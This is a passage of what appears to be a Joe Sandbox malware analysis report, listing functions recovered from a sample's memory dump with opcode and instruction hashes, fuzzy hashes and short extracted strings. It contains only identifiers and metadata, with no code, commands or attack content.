                                                    • Opcode Fuzzy Hash: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
                                                    • Instruction Fuzzy Hash: F641F1706047819FE7268F249890B63BFE1AF67304F28449DE4D65F392D72A9806CB65
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NP,?$EA
                                                    • API String ID: 0-3550630486
                                                    • Opcode ID: c8b8e796abceac3594a91b638e490a64fbfa8cc7ef476cca3c0e389b64e5e7b0
                                                    • Instruction ID: 2e7f34938e04f27cbf53eb242d69fe801042e8981dab05c8edde02431b6dd9ba
                                                    • Opcode Fuzzy Hash: c8b8e796abceac3594a91b638e490a64fbfa8cc7ef476cca3c0e389b64e5e7b0
                                                    • Instruction Fuzzy Hash: 5E4222B4608201DBD7148F28E841BBB73A1FF86328F154A2DF591572E1E778EC55C78A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$8
                                                    • API String ID: 0-46163386
                                                    • Opcode ID: 6c0d5d3be257b6a3fd1de638671c8b12e5484a8c530135887e69e884293760cf
                                                    • Instruction ID: ccb06c0a2e0de9deaa04bce5d562da717ac6b95b8a28923c7ff2a21ca4b657dd
                                                    • Opcode Fuzzy Hash: 6c0d5d3be257b6a3fd1de638671c8b12e5484a8c530135887e69e884293760cf
                                                    • Instruction Fuzzy Hash: 967235B1508341AFD710CF18C884BABBBE1AF84314F44892EF9999B391C779D958CF96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )A$eA
                                                    • API String ID: 0-3047952920
                                                    • Opcode ID: f17ea89f4d1b368da92741cca1a27be89d7296a3ee0b739eace175103a64188a
                                                    • Instruction ID: a0969c83d05d4ee8c97119b57e028d19e1de82d2bfa65bbec59b05e925b9ead1
                                                    • Opcode Fuzzy Hash: f17ea89f4d1b368da92741cca1a27be89d7296a3ee0b739eace175103a64188a
                                                    • Instruction Fuzzy Hash: EE6270B0609B818ED335CF3C8815797BFD5AB5A324F148A5EE0FA873D2C77561028B66
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LMB$pv
                                                    • API String ID: 0-122907696
                                                    • Opcode ID: 600361d03a19618f7b8b94130096601f70c9cb3cba6cb4618556b265baeca412
                                                    • Instruction ID: 3eeefadaa77a5fd53610c3ddf5e6e08206d1469657b97126345bc7f1514b4473
                                                    • Opcode Fuzzy Hash: 600361d03a19618f7b8b94130096601f70c9cb3cba6cb4618556b265baeca412
                                                    • Instruction Fuzzy Hash: 17E134B15183008BD3249F29C8623ABB7F1EFD2314F19892DD5C68B3A5E7799846C786
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "$"
                                                    • API String ID: 0-3758156766
                                                    • Opcode ID: 54e3175d32b773b9e9c1025c84d052112ddd069704eaf9d2eb6da4d3bace2a73
                                                    • Instruction ID: 61e0fe3940d769720f6f4791c22ea050c43e4b3387fc0a82dac58289e7fab3aa
                                                    • Opcode Fuzzy Hash: 54e3175d32b773b9e9c1025c84d052112ddd069704eaf9d2eb6da4d3bace2a73
                                                    • Instruction Fuzzy Hash: A1F11272B083258FC714CE24D48076BB7D6AFC4314F99896EE8998B392D738DD09C786
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 1$a
                                                    • API String ID: 0-297133789
                                                    • Opcode ID: c5f74b42330831985239496e1d4f39fb0a653775eb781e006d056080418a89d4
                                                    • Instruction ID: 50b0e87344bede7c61e37aabca88bd69b4ed90587826eff82c5637a773e23675
                                                    • Opcode Fuzzy Hash: c5f74b42330831985239496e1d4f39fb0a653775eb781e006d056080418a89d4
                                                    • Instruction Fuzzy Hash: 95E16875608320CFD3149F28AC4126B77E2EB86314F49496EE9D197392E738AD19C78B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 45$uw
                                                    • API String ID: 0-851133776
                                                    • Opcode ID: ab637dcdc1d75d2e8c1a6476f08b4d58cc792c803b02a06a08f3a248bcfca3ae
                                                    • Instruction ID: e49b2e20cfe9ba5ce7cb5790c572c6cd382ddd2734a676778ebff5933d168dd8
                                                    • Opcode Fuzzy Hash: ab637dcdc1d75d2e8c1a6476f08b4d58cc792c803b02a06a08f3a248bcfca3ae
                                                    • Instruction Fuzzy Hash: A6C121745083048BC718CF28C8926ABB3F1EFC5314F19C96EE8968B391E778D945C796
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NP,?$mij
                                                    • API String ID: 0-1436015776
                                                    • Opcode ID: b0905b15df5a93d70dff43b587df237d303d7f495d29f252faf92cbeebdeaadb
                                                    • Instruction ID: d401854fd2cc12c548c1ecfb90c4d04a7bab5840ee8d20629697b9478a788be7
                                                    • Opcode Fuzzy Hash: b0905b15df5a93d70dff43b587df237d303d7f495d29f252faf92cbeebdeaadb
                                                    • Instruction Fuzzy Hash: BAA159756043109BD314DF25C8C162BB7A1EBC9728F24662EE9A5373D1D338EC018BDA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )$IEND
                                                    • API String ID: 0-707183367
                                                    • Opcode ID: 68ec6af04dd140ff68b0080ca3686c18edbdf247115d4d432d89b22d16dc4d31
                                                    • Instruction ID: b5c58118511f7ab27c9ce5a77da79783a4285a76a4993dc0d68ffacd4de415e2
                                                    • Opcode Fuzzy Hash: 68ec6af04dd140ff68b0080ca3686c18edbdf247115d4d432d89b22d16dc4d31
                                                    • Instruction Fuzzy Hash: 2BD1C2B1A083449FD710CF14D84175BBBE4ABD5308F14492EFA98AB3C2D779E904CB96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: }$~
                                                    • API String ID: 0-3846021004
                                                    • Opcode ID: 574856a951496172c10f24d6272443698a4463c6339c9a7123374a18d19c9391
                                                    • Instruction ID: a6f5a58453f41cefe64683c3ca1862db3038e1f21351879acc05657e814d8347
                                                    • Opcode Fuzzy Hash: 574856a951496172c10f24d6272443698a4463c6339c9a7123374a18d19c9391
                                                    • Instruction Fuzzy Hash: 0591153674EA914BC719893C4C513EAAF934BD7230F2DC76EE8F58B3D2D52888468356
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: }$~
                                                    • API String ID: 0-3846021004
                                                    • Opcode ID: 9c651afb8884db2b8ed531508840d92c93680f60ef013fdbb885d5c65550ea95
                                                    • Instruction ID: 10eb8eb1221c810e9ff21c9e5650af260ae2c54e12271e75aa51dbd00d3cd542
                                                    • Opcode Fuzzy Hash: 9c651afb8884db2b8ed531508840d92c93680f60ef013fdbb885d5c65550ea95
                                                    • Instruction Fuzzy Hash: A9714B2660D6D14BD7289E3C4C113AABED20FD7231F2CD7AEE4F5873E2D56989028346
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: }$~
                                                    • API String ID: 0-3846021004
                                                    • Opcode ID: b89aeb8f7c5bc573797a562e5b9ad2442b0305510d530974ee3cfcaf6155a88d
                                                    • Instruction ID: 2b4f25648cf012893ecccc6bc10ba7d797c7576365e8f899a19edef63a8e56f2
                                                    • Opcode Fuzzy Hash: b89aeb8f7c5bc573797a562e5b9ad2442b0305510d530974ee3cfcaf6155a88d
                                                    • Instruction Fuzzy Hash: 36717C2270DA814BD728493C8C513AABE830BDB330F2ED77EE5F18B3D2D5A988059345
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M"O$fI.K
                                                    • API String ID: 0-3473069917
                                                    • Opcode ID: 80b5e25900e62fa5b7f868b9038989c12ce663ab15b6782b2becc0f24b60a991
                                                    • Instruction ID: 329e37de618e8a484b718af78b4319e64e69ed5ee2b204ae71a9d2e2a7026588
                                                    • Opcode Fuzzy Hash: 80b5e25900e62fa5b7f868b9038989c12ce663ab15b6782b2becc0f24b60a991
                                                    • Instruction Fuzzy Hash: 6431F275204691CBE7058F2AD450332FBE2EFA2310F69959DC0C69B392C679A8038B98
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M"O$fI.K
                                                    • API String ID: 0-3473069917
                                                    • Opcode ID: a50f177498f9f56b16f7faf9ec1f3eef4274cbe2d8e1a906e5367dc70dca7c59
                                                    • Instruction ID: f6fd3104235a574d950e3c7a6e1b37e2e28bb9fd8ddddb0b7385076b5cae7f54
                                                    • Opcode Fuzzy Hash: a50f177498f9f56b16f7faf9ec1f3eef4274cbe2d8e1a906e5367dc70dca7c59
                                                    • Instruction Fuzzy Hash: 9531E4752047418BE705CF2AD850723FBE2EFA6310F69959DC0C59F392CA79A843CB88
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 03fa9a4ef5fc09b88c951e717f6d84c64096d515bfc5bfa11bc015a710778202
                                                    • Instruction ID: ffeaf69f11ebdaa19ebbeb2c849f1362720ea4a43f49444d7a0805305d646c0f
                                                    • Opcode Fuzzy Hash: 03fa9a4ef5fc09b88c951e717f6d84c64096d515bfc5bfa11bc015a710778202
                                                    • Instruction Fuzzy Hash: C3220875604B408FC714DF38C48539ABBE2AF85314F15892ED9EB873A2E639E549CB43
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: UGS0
                                                    • API String ID: 0-520979954
                                                    • Opcode ID: dfb94d8d359fc81a05778ab09c2605d52757e9ab0d7f5b57afd7d332d254ecac
                                                    • Instruction ID: 3348e13afeb0dd66d0b42f92764ac4a19cd9e9b65c21c83913ba49dcaa38d822
                                                    • Opcode Fuzzy Hash: dfb94d8d359fc81a05778ab09c2605d52757e9ab0d7f5b57afd7d332d254ecac
                                                    • Instruction Fuzzy Hash: 8332B174200B01CFD725CF29D891BA3B7A2FF86314F19869DD4968B7A1D774E882CB94
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r!D
                                                    • API String ID: 0-1427830086
                                                    • Opcode ID: 8066b95fdf58a8485039f6bd82a37e953757c2e5cc5a4bfb8100e9cc80e20a61
                                                    • Instruction ID: 3cbef11c9a3ce934bd2371589f199791f426b11a6ad4740408174b3a4e74d17a
                                                    • Opcode Fuzzy Hash: 8066b95fdf58a8485039f6bd82a37e953757c2e5cc5a4bfb8100e9cc80e20a61
                                                    • Instruction Fuzzy Hash: 6B121039718211CFD708CF38D89062AB3E2FB8A315F1A897ED58687365D734D891CB85
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: _\
                                                    • API String ID: 0-505892539
                                                    • Opcode ID: e151fd77c1b513c9d1fc853a18fbbb0d5f395fcc726f05ed7b31c23f364176dd
                                                    • Instruction ID: 387b8c9453b82b61d9c904b796da75a3b5f1fa39b900c3c8147bbc4438cb0180
                                                    • Opcode Fuzzy Hash: e151fd77c1b513c9d1fc853a18fbbb0d5f395fcc726f05ed7b31c23f364176dd
                                                    • Instruction Fuzzy Hash: 4C12E03AA18352CBC7149F38D84226BB7E2EF89310F0AC939D48597290E77CDA65C756
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r!D
                                                    • API String ID: 0-1427830086
                                                    • Opcode ID: 85603856905c4a4f195af4f24670044c03e48a4b33cd73fa0abfa814962da6a1
                                                    • Instruction ID: a06da2a7510bafe70ce3d2561cf559b616cef3d484291c66b41e0c515b2c2d32
                                                    • Opcode Fuzzy Hash: 85603856905c4a4f195af4f24670044c03e48a4b33cd73fa0abfa814962da6a1
                                                    • Instruction Fuzzy Hash: D0E1EC39719251CFD708CF38D89066AB3E2FB8A315F1A897ED58683365C738D851CB85
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r!D
                                                    • API String ID: 0-1427830086
                                                    • Opcode ID: 6f878ccae5c505e2ff999e0c01f97702648bc5fa6a6966721696372b96f72e3e
                                                    • Instruction ID: c755686a4332cf064cea235db5d2835f48d151b631f4c01ad3b162a843bf9e1f
                                                    • Opcode Fuzzy Hash: 6f878ccae5c505e2ff999e0c01f97702648bc5fa6a6966721696372b96f72e3e
                                                    • Instruction Fuzzy Hash: 11E1EC39718211CFD708CF38D89066AB3E2FB8A315F1A897DD58A83365C738D851CB85
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r!D
                                                    • API String ID: 0-1427830086
                                                    • Opcode ID: dd782d22cddc781079d978155dd15ba88b5c707dba8ff791ed422af05367eedc
                                                    • Instruction ID: 449aedb15a5c66098da17fa39f105c8c994b9e20c3147fb75fcf3787673fd1a6
                                                    • Opcode Fuzzy Hash: dd782d22cddc781079d978155dd15ba88b5c707dba8ff791ed422af05367eedc
                                                    • Instruction Fuzzy Hash: 19D1DD3A719251CFD708CF38D89062AB3E2FB8A315F1A897DD58A87361D738D851CB85
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: }
                                                    • API String ID: 0-4239843852
                                                    • Opcode ID: 6fb93c91da6cfd1c4245782af60370d1767e41f090d3b747876532802dd19a64
                                                    • Instruction ID: 26ba260b14138d9a95a984c8e0db81d50ed88c365ec99f1f3b2d9ff95aad7ec5
                                                    • Opcode Fuzzy Hash: 6fb93c91da6cfd1c4245782af60370d1767e41f090d3b747876532802dd19a64
                                                    • Instruction Fuzzy Hash: 8BE10231588301AFD7108F24CC85B9BBBE1EFD5354F148A2EF4D4A72A1D739D9858B8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r!D
                                                    • API String ID: 0-1427830086
                                                    • Opcode ID: 6a383e139219aa4231859b86b0c43952a01f5ba8d69cd62de4ce561c2214cff1
                                                    • Instruction ID: 3943c725ea9c2734471285e08a6d116742d81fc3d3d880d0a4650d4c70a6e07e
                                                    • Opcode Fuzzy Hash: 6a383e139219aa4231859b86b0c43952a01f5ba8d69cd62de4ce561c2214cff1
                                                    • Instruction Fuzzy Hash: F5C1DD3A618251CFD708CF38D8A066AB7E2FF8A315F1A897DD58687361D738D841CB85
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r!D
                                                    • API String ID: 0-1427830086
                                                    • Opcode ID: f7188ad9813d7bfbb9cf9dd212625e88cc0244e77462d4219da92fe6ff4728d1
                                                    • Instruction ID: 20006929f050a8e451167e2d48fe52922d1d07b002cce6178d4b46f5f936f5fe
                                                    • Opcode Fuzzy Hash: f7188ad9813d7bfbb9cf9dd212625e88cc0244e77462d4219da92fe6ff4728d1
                                                    • Instruction Fuzzy Hash: 15C1E03A618250CFD708CF38D89066AB7E2FBCA315F1A897DD486833A5D738D951CB85
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: KtBD
                                                    • API String ID: 0-2371315874
                                                    • Opcode ID: 1e2fd2be9ca198393f03e0601304aa857cb6ba30b32e08678b26c1b7f5c2d9e7
                                                    • Instruction ID: ac5744b8ab6e67623932c2e274ea81386a75d073d127ce708834299026137f5e
                                                    • Opcode Fuzzy Hash: 1e2fd2be9ca198393f03e0601304aa857cb6ba30b32e08678b26c1b7f5c2d9e7
                                                    • Instruction Fuzzy Hash: 16A167755583504FD718CF38C8906AFBBE2ABD6304F088A6DF1D297385DB798906CB82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @uB
                                                    • API String ID: 0-1161951709
                                                    • Opcode ID: f8a3ba9d7d15869a0590316285b3361bbc22125b0af2a42800cc0a1cbe75883f
                                                    • Instruction ID: 3f551a4cb18cdb69ea81a70624d177d743b65059aaf82db93a0913f8d0b3051b
                                                    • Opcode Fuzzy Hash: f8a3ba9d7d15869a0590316285b3361bbc22125b0af2a42800cc0a1cbe75883f
                                                    • Instruction Fuzzy Hash: BBA10FB560C300CFD714DF29E84162BB7E5FB86314F98482EF585A3251EB78E902CB5A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %=>?
                                                    • API String ID: 0-1840824467
                                                    • Opcode ID: e07febe003d47278271e69a6a0aefd5b767d6bdb8c9269540a4227fbb6a47e9b
                                                    • Instruction ID: 2abc8e8e60c77c2f0b16dca8ff0b337e7e89a8bc06769c8938415a8ee5640db8
                                                    • Opcode Fuzzy Hash: e07febe003d47278271e69a6a0aefd5b767d6bdb8c9269540a4227fbb6a47e9b
                                                    • Instruction Fuzzy Hash: 3291F832F046664BC7108E2DCA8025BB7E1ABC5754F698A3EE8D4E73D5EA3CCC454789
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FL~O
                                                    • API String ID: 0-2976162848
                                                    • Opcode ID: 18649a1a29131128d5b4adce49bc42d5c1c1f33e7a2e72b95aa3a9eea7d687c0
                                                    • Instruction ID: 7183c90d1eb5b33d84056431fd94899f29f45a832c645f55df25c9b471943a3a
                                                    • Opcode Fuzzy Hash: 18649a1a29131128d5b4adce49bc42d5c1c1f33e7a2e72b95aa3a9eea7d687c0
                                                    • Instruction Fuzzy Hash: 3A7114B16047818FD725CF29C480763FBE2BFAA300F28858ED4D68B356C738A846CB55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,
                                                    • API String ID: 0-3772416878
                                                    • Opcode ID: ecebe23ec0881f7020f4b901c59648ec2a6586f088ba65e78406499129a36248
                                                    • Instruction ID: 76febda03ca88e145cf8db2825d9d179e56480a101f86817b61f93bc5d60e124
                                                    • Opcode Fuzzy Hash: ecebe23ec0881f7020f4b901c59648ec2a6586f088ba65e78406499129a36248
                                                    • Instruction Fuzzy Hash: 97B139711087819FD325CF28C88061BFBE0AFA9704F448A2DF5D997382D675EA18CB97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: gfff
                                                    • API String ID: 0-1553575800
                                                    • Opcode ID: 46536902f8b34a0f2bb0dc7f4bd700dbe76e714aa1d273e071a395a8dd1bee89
                                                    • Instruction ID: 6d2678371d46dde300f0c9aca5f5b31911bdfc87d34d190af218ff5233393cf1
                                                    • Opcode Fuzzy Hash: 46536902f8b34a0f2bb0dc7f4bd700dbe76e714aa1d273e071a395a8dd1bee89
                                                    • Instruction Fuzzy Hash: 8E91347A610A018BE318CF39C8917A677E3FBC4328F19862ED556CB7D5DB78E8068744
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 79.'
                                                    • API String ID: 0-3373235548
                                                    • Opcode ID: 3052bdd5b9f525bfd9188c849dd4df91fdd9a95299ae7d6644acfbbe7ea22ffb
                                                    • Instruction ID: 405c93bd9d9a1b956de89b764b78e8638e9be0a0d1f875f63fdafa76fe9ef724
                                                    • Opcode Fuzzy Hash: 3052bdd5b9f525bfd9188c849dd4df91fdd9a95299ae7d6644acfbbe7ea22ffb
                                                    • Instruction Fuzzy Hash: 4841E7745043A08BE7274B2A98A0733BFE1BF13305F68598DD0D21B792C26AA407CB55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ;?
                                                    • API String ID: 0-2547853717
                                                    • Opcode ID: ccb7de308d25c249a6e601e2217555a25a490892ed8e0f1f8809a87c2b3bb699
                                                    • Instruction ID: 345a1d19f6ef4a761144819c2a4b0586d162fe2b90bf75277ce9f538902e393a
                                                    • Opcode Fuzzy Hash: ccb7de308d25c249a6e601e2217555a25a490892ed8e0f1f8809a87c2b3bb699
                                                    • Instruction Fuzzy Hash: DD5156B960D3808FE3288F65888175FBBE1BBC5714F15892DE2D99B790DB749805CF82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "jB
                                                    • API String ID: 0-3276335117
                                                    • Opcode ID: 1f66a87aa27601af76395a073f8366dbe3f1549dff5cf4ca866cc54e43ced975
                                                    • Instruction ID: 5e1d8c0b1515ecfa31faa1c568337e693052fbc6b42adfdfb911d364570a270e
                                                    • Opcode Fuzzy Hash: 1f66a87aa27601af76395a073f8366dbe3f1549dff5cf4ca866cc54e43ced975
                                                    • Instruction Fuzzy Hash: D3C08CB6C080028FC5002F00AC0201AB9316B0320CF082039E40931133FA32F625950F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 14e624bee96e47c6332c5ade784e2d0ceaf0cdec4d8aca0be867267f1b83f6b7
                                                    • Instruction ID: 19e77cbeac70fe1b032dade778546ae4f90eb2d797e4cd6945b2f28ddd58a70d
                                                    • Opcode Fuzzy Hash: 14e624bee96e47c6332c5ade784e2d0ceaf0cdec4d8aca0be867267f1b83f6b7
                                                    • Instruction Fuzzy Hash: 527237B1614B819FD365CF39C805793BFE9AB9A310F18892ED0EAC3752C778A901CB55
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6622422d7539ce0b52b06fdf36dba662481708c3368aacd43c76f1fee5f17e3d
                                                    • Instruction ID: 5a005799855934c09976bcccaf90a1a408f8946ac336e46e74ae0774756d1960
